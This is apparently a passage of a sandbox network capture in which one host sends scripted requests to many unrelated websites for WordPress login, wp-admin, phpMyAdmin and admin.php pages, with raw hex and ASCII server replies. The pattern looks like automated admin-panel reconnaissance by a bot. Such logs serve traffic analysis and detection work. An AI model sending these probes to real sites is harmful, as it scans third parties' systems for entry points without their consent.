margin-top:10px;

Session ID	Source IP	Source Port	Destination IP	Destination Port
179	192.168.2.4	64343	69.42.204.12	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:01 UTC	385	OUT	GET /wordpress/wp-login.php?redirect_to=https%3A%2F%2Fbldowney.com%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: bldowney.com Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=dab9654e76fcb87f013f9734233b1b7a User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://bldowney.com/wp-login.php
2023-12-22 20:15:02 UTC	417	IN	HTTP/1.1 500 Internal Server Error Date: Fri, 22 Dec 2023 20:15:01 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/wordpress/ Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:15:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
180	192.168.2.4	64295	91.132.253.137	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:01 UTC	179	OUT	GET /index.php HTTP/1.1 Host: flandria-loisirs.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	533	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:02 GMT Server: Apache X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=300 Upgrade: h2,h2c Connection: Upgrade, close Location: https://www.flandria-loisirs.com/index.php/ Cache-Control: max-age=0 Expires: Fri, 22 Dec 2023 20:15:01 GMT X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; img-src * data: blob: 'unsafe-inline'; Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:15:02 UTC	430	IN	Data Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: 1a2<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.flandria-loisirs.com/index.php/'" /> <title>Redirecting to https://www.flandria-loisirs.com/index.php/</title>

Session ID	Source IP	Source Port	Destination IP	Destination Port
181	192.168.2.4	64406	167.235.0.29	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:01 UTC	183	OUT	GET /wp-admin/ HTTP/1.1 Host: www.fotoestudiomiret.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	382	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 32 20 44 65 63 20 32 30 32 33 20 32 30 3a 31 35 3a 30 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 31 3b 20 6d 6f 64 65 3d 62 6c 6f 63 6b 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 3a 20 2a 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 Data Ascii: HTTP/1.0 404 Not FoundDate: Fri, 22 Dec 2023 20:15:02 GMTServer: ApacheX-XSS-Protection: 1; mode=blockAccess-Control-Allow-Origin: Access-Control-Allow-Headers: Access-Control-Allow-Methods: Access-Control-Request-Method: Content-Secur
2023-12-22 20:15:02 UTC	7810	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 0d 0a 20 20 20 20 0a 3c 73 74 79 6c 65 3e 0a 68 74 6d 6c 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 74 6f 65 73 74 75 64 69 6f 6d 69 72 65 74 2e 63 6f 6d 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 Data Ascii: <!DOCTYPE html><html lang="es"> <head> <style>html,body{background-color:;}</style><base href="https://www.fotoestudiomiret.com" /><meta charset="utf-8" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http
2023-12-22 20:15:02 UTC	16384	IN	Data Raw: 69 6f 6e 2d 63 69 72 63 6c 65 22 2c 22 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 22 3a 22 66 61 73 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 22 2c 22 65 78 63 6c 61 6d 61 74 69 6f 6e 22 3a 22 66 61 73 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 22 2c 22 65 78 70 61 6e 64 22 3a 22 66 61 73 20 66 61 2d 65 78 70 61 6e 64 22 2c 22 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 22 3a 22 66 61 73 20 66 61 2d 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 22 2c 22 65 79 65 22 3a 22 66 61 73 20 66 61 2d 65 79 65 22 2c 22 65 79 65 2d 73 6c 61 73 68 22 3a 22 66 61 73 20 66 61 2d 65 79 65 2d 73 6c 61 73 68 22 2c 22 66 61 63 65 2d 67 72 69 6e 22 3a 22 66 61 73 20 66 61 2d 67 72 69 6e 22 2c 22 66 61 63 65 62 6f 6f 6b 22 3a 22 66 61 62 Data Ascii: ion-circle","exclamation-triangle":"fas fa-exclamation-triangle","exclamation":"fas fa-exclamation","expand":"fas fa-expand","external-link":"fas fa-external-link","eye":"fas fa-eye","eye-slash":"fas fa-eye-slash","face-grin":"fas fa-grin","facebook":"fab
2023-12-22 20:15:02 UTC	16384	IN	Data Raw: 6f 73 73 68 61 69 72 73 22 3a 22 66 61 6c 20 66 61 2d 63 72 6f 73 73 68 61 69 72 73 22 2c 22 63 73 73 33 22 3a 22 66 61 62 20 66 61 2d 63 73 73 33 22 2c 22 63 75 62 65 73 22 3a 22 66 61 73 20 66 61 2d 63 75 62 65 73 22 2c 22 64 65 6c 69 63 69 6f 75 73 22 3a 22 66 61 62 20 66 61 2d 64 65 6c 69 63 69 6f 75 73 22 2c 22 64 65 73 6b 74 6f 70 22 3a 22 66 61 73 20 66 61 2d 64 65 73 6b 74 6f 70 22 2c 22 64 65 76 69 61 6e 74 61 72 74 22 3a 22 66 61 62 20 66 61 2d 64 65 76 69 61 6e 74 61 72 74 22 2c 22 64 6f 74 2d 63 69 72 63 6c 65 22 3a 22 66 61 72 20 66 61 2d 64 6f 74 2d 63 69 72 63 6c 65 22 2c 22 64 6f 77 6e 6c 6f 61 64 22 3a 22 66 61 73 20 66 61 2d 64 6f 77 6e 6c 6f 61 64 22 2c 22 64 72 69 62 62 62 6c 65 22 3a 22 66 61 62 20 66 61 2d 64 72 69 62 62 62 6c 65 22 Data Ascii: osshairs":"fal fa-crosshairs","css3":"fab fa-css3","cubes":"fas fa-cubes","delicious":"fab fa-delicious","desktop":"fas fa-desktop","deviantart":"fab fa-deviantart","dot-circle":"far fa-dot-circle","download":"fas fa-download","dribbble":"fab fa-dribbble"
2023-12-22 20:15:02 UTC	16384	IN	Data Raw: 22 20 64 61 74 61 2d 6c 65 76 65 6c 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 63 61 72 65 74 2d 72 69 67 68 74 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 64 61 74 61 2d 63 6f 6c 6c 61 70 73 65 3d 22 66 61 2d 63 61 72 65 74 2d 72 69 67 68 74 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 20 64 61 74 61 2d 73 75 63 63 65 73 73 3d 22 66 61 2d 63 61 72 65 74 2d 64 6f 77 6e 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 75 6c 20 Data Ascii: " data-level="0"> <i class="fas fa-caret-right default-fasize" aria-hidden="true" data-collapse="fa-caret-right default-fasize" data-success="fa-caret-down default-fasize"></i> </a></div><ul
2023-12-22 20:15:02 UTC	12337	IN	Data Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 66 6c 65 78 2d 65 6e 64 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 65 6d 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 0a 20 20 3c 64 69 76 20 69 64 3d 22 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 2d 74 65 78 74 27 20 69 64 3d 22 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 73 2d 74 65 78 74 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 2d 62 75 74 74 6f 6e 73 27 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 Data Ascii: justify-content: flex-end; margin-top: 2em; margin-bottom: 1em; } </style> <div id="aviso-cookies"> <div class='aviso-cookie-text' id="aviso-cookies-text"> </div> <div class='aviso-cookie-buttons'> <a href="https://w

Session ID	Source IP	Source Port	Destination IP	Destination Port
182	192.168.2.4	64331	20.197.30.48	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:01 UTC	182	OUT	GET //PhpMyAdmin/ HTTP/1.1 Host: trivandrum.german.in Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	1105	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 32 20 44 65 63 20 32 30 32 33 20 32 30 3a 31 35 3a 30 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 58 53 52 46 2d 54 4f 4b 45 4e 3d 65 79 4a 70 64 69 49 36 49 6e 46 49 62 30 31 44 55 44 5a 4f 54 48 52 42 51 7a 42 31 52 6d 4a 76 65 56 56 76 51 58 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 59 58 42 73 4e 6e 70 75 62 6b 68 35 61 56 5a 34 62 31 68 56 53 58 70 71 4d 31 5a 75 65 58 51 79 57 46 56 69 52 45 63 79 65 57 52 31 64 6e 51 78 4d Data Ascii: HTTP/1.0 404 Not FoundDate: Fri, 22 Dec 2023 20:15:02 GMTServer: Apache/2.4.41 (Ubuntu)Cache-Control: no-cache, privateSet-Cookie: XSRF-TOKEN=eyJpdiI6InFIb01DUDZOTHRBQzB1RmJveVVvQXc9PSIsInZhbHVlIjoiYXBsNnpubkh5aVZ4b1hVSXpqM1ZueXQyWFViREcyeWR1dnQxM
2023-12-22 20:15:02 UTC	1945	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 20 7c 20 57 65 6c 63 6f 6d 65 20 74 6f 20 4a 6f 73 68 20 46 72 6f 6e 74 65 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f Data Ascii: <!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>404 page \| Welcome to Josh Frontend</title> <meta content='width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no

Session ID	Source IP	Source Port	Destination IP	Destination Port
183	192.168.2.4	64649	13.35.116.12	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:01 UTC	174	OUT	GET /phpmyadmin HTTP/1.1 Host: www.wika.co.in Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	1156	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Content-Length: 180 Connection: close Date: Fri, 22 Dec 2023 20:14:53 GMT Server: web Location: https://www.wika.com/en-in/phpmyadmin X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com/) X-ManagedFusion-Rewriter-Version: 3.7 X-UA-Compatible: IE=edge strict-transport-security: max-age=31536000; includeSubDomains; Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: ; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline'; Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XXS-Protection: 1; mode=block X-Powered-By: ARR/3.0 X-Cache: Hit from cloudfront Via: 1.1 6492b42e2fc3684cc00b54d685c2328c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: MIA3-C2 X-Amz-Cf-Id: rNUGihuS0ukTxzWJcW-VLvw88Fvb8nKIJwyI5V7ju7T2bkUoWQExyw== Age: 7
2023-12-22 20:15:02 UTC	180	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 55 52 49 20 74 68 61 74 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 68 61 73 20 62 65 65 6e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 6b 61 2e 63 6f 6d 2f 65 6e 2d 69 6e 2f 70 68 70 6d 79 61 64 6d 69 6e 22 3e 6d 6f 76 65 64 20 74 6f 20 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Moved Permanently</title></head><body><p>The URI that you requested has been <a href="https://www.wika.com/en-in/phpmyadmin">moved to here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
184	192.168.2.4	64659	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:01 UTC	337	OUT	GET /admin.php HTTP/1.1 Host: customizedperformance.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:15:02 GMT Content-Type: text/html Content-Length: 12976 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-32b0" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_RPrcJ8ZC9xoFuJFFb2zoURfFX9ymg0jBhDN46axmnx5IqhvyrxM3r1QUyzM+UMlocZuecmKq9mdVS7w8r61obg Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:15:02 UTC	12976	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
185	192.168.2.4	64727	104.21.52.80	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:01 UTC	164	OUT	GET / HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	932	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: max-age=0 Expires: Fri, 22 Dec 2023 20:15:02 GMT Last-Modified: Fri, 22 Dec 2023 20:11:00 GMT Vary: X-Forwarded-Proto,Accept-Encoding,User-Agent Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A5PK3Ywgb6IQ5uDY383ejWw5BusMr0braI7kiWm8P4nShqY%2BTTjwjWFkENzU9%2BzVRR7HhCvV7Irthdb6qFNqd%2BvrP6ATaEKaIQdtmHb5PTwC1p8mY19XyFtHvHK9baCDKA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b08d67bb3741a-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:02 UTC	437	IN	Data Raw: 34 64 63 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 63 6c 61 73 73 3d 22 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 68 74 6d 6c 29 7b 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 2e 72 65 70 6c 61 63 65 28 2f 5c 62 6e Data Ascii: 4dcf<!DOCTYPE html><html lang="en-US" prefix="og: https://ogp.me/ns#" class="loading-site no-js"><head><meta charset="UTF-8" /><link rel="profile" href="https://gmpg.org/xfn/11" /><script>(function(html){html.className = html.className.replace(/\bn
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 6e 6e 61 43 6c 65 61 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 42 75 6c 6b 20 44 65 6c 74 61 2d 38 20 54 48 43 20 70 72 6f 64 75 63 74 73 20 61 74 20 75 6e 62 65 61 74 61 62 6c 65 20 70 72 69 63 65 73 2e 20 42 75 79 20 44 65 6c 74 61 20 38 20 54 48 43 20 4f 69 6c 2c 20 44 38 20 56 61 70 65 73 2c 20 48 48 43 2c 20 54 48 43 2d 4f 2c 20 48 48 43 2d 4f 20 61 6e 64 20 6f 74 68 65 72 20 63 61 6e 6e 61 62 69 6e 6f 69 64 73 20 6f 6e 6c 69 6e 65 2e 20 53 68 6f 70 20 6e 6f 77 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 66 6f 6c 6c 6f 77 2c 20 69 6e 64 65 78 2c 20 6d 61 78 2d 73 6e 69 70 70 65 74 3a 2d 31 2c 20 6d 61 Data Ascii: nnaClear</title><meta name="description" content="Bulk Delta-8 THC products at unbeatable prices. Buy Delta 8 THC Oil, D8 Vapes, HHC, THC-O, HHC-O and other cannabinoids online. Shop now!" /><meta name="robots" content="follow, index, max-snippet:-1, ma
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 32 30 32 30 2d 31 31 2d 30 35 45 53 54 30 37 3a 30 34 3a 34 37 2d 30 35 3a 30 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 79 61 3a 6f 76 73 3a 61 6c 6c 6f 77 5f 65 6d 62 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 66 61 6c 73 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 42 75 79 20 44 65 6c 74 61 20 38 20 54 48 43 20 7c 20 42 75 79 20 44 65 6c 74 61 2d 38 20 54 48 43 20 42 75 6c 6b 20 44 69 73 74 69 6c 6c 61 74 65 20 4f 6e 6c 69 6e 65 20 7c 20 Data Ascii: ate" content="2020-11-05EST07:04:47-05:00" /><meta property="ya:ovs:allow_embed" content="false" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="Buy Delta 8 THC \| Buy Delta-8 THC Bulk Distillate Online \|
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 3d 22 77 63 2d 61 75 74 68 6f 72 69 7a 65 2d 6e 65 74 2d 63 69 6d 2d 63 68 65 63 6b 6f 75 74 2d 62 6c 6f 63 6b 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 2f 31 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 67 61 74 65 77 61 79 2d 61 75 74 68 6f 72 69 7a 65 2d 6e 65 74 2d 63 69 6d 2f 61 73 73 65 74 73 2f 63 73 73 2f 62 6c 6f 63 6b 73 2f 77 63 2d 61 75 74 68 6f 72 69 7a 65 2d 6e 65 74 2d 63 69 6d 2d 63 68 65 63 6b 6f 75 74 2d 62 6c 6f 63 6b 2e 63 73 73 3f 76 65 72 3d 31 37 30 33 30 30 31 38 31 37 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f Data Ascii: ="wc-authorize-net-cim-checkout-block-css" href="https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woocommerce-gateway-authorize-net-cim/assets/css/blocks/wc-authorize-net-cim-checkout-block.css?ver=1703001817" type="text/css" media="all" /
